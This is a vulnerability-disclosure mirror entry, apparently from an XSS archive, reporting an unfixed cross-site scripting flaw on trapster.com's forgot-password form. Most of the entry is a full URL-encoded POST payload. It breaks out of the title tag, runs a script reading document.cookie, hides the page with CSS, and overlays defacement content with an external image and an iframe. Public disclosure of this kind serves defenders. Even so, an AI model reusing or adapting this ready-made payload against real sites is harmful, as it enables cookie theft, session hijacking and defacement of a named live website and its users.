Security researcher Sony, has submitted on 21/01/2011 a cross-site-scripting (XSS) vulnerability affecting trapster.com, which at the time of submission ranked 200564 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/04/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/01/2011 |
Date published: 02/04/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: Sony |
Domain: trapster.com |
Category: XSS |
Pagerank: 200564 |
URL: http://trapster.com/forgot-password.php |
POST: email=%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3Ebody%7Bvis ibility%3Ahidden%3B%7D+html%7Bbackground-color%3A+Black%3B%7D%3C%2Fstyle%3E%27%22%3E%3Cdiv+style%3D% 22position%3A+absolute%3Bleft%3A+420px%3Btop%3A+40px%3B%25E2%2580%258B%25E2%2580%258Bz-index%3A+10%3 Bvisibility%3A+visible%3B+color%3A+White%3B+font-size%3A+40px%3B%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi nsecurity.ro%2Fboard%2Fimages%2Fstyles%2Faugreensmc%2Fgradients%2Faugreen_logo.png%22+style%3D%22hei ght%3A+385px%3B+width%3A+480px%3B%22+alt%3D%22By+test%22%3E%3Cbr%3Etest%3Cbr%3Etest%3Ciframe+src+%3D http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DgIuotFZnBtk%22+width%3D%22400%22+height%3D%22500%22+%5C%3 E%3C%2Fdiv%3E&captcha=qw3hw5&button2=Submit |
Click here to view the mirror
|
|
|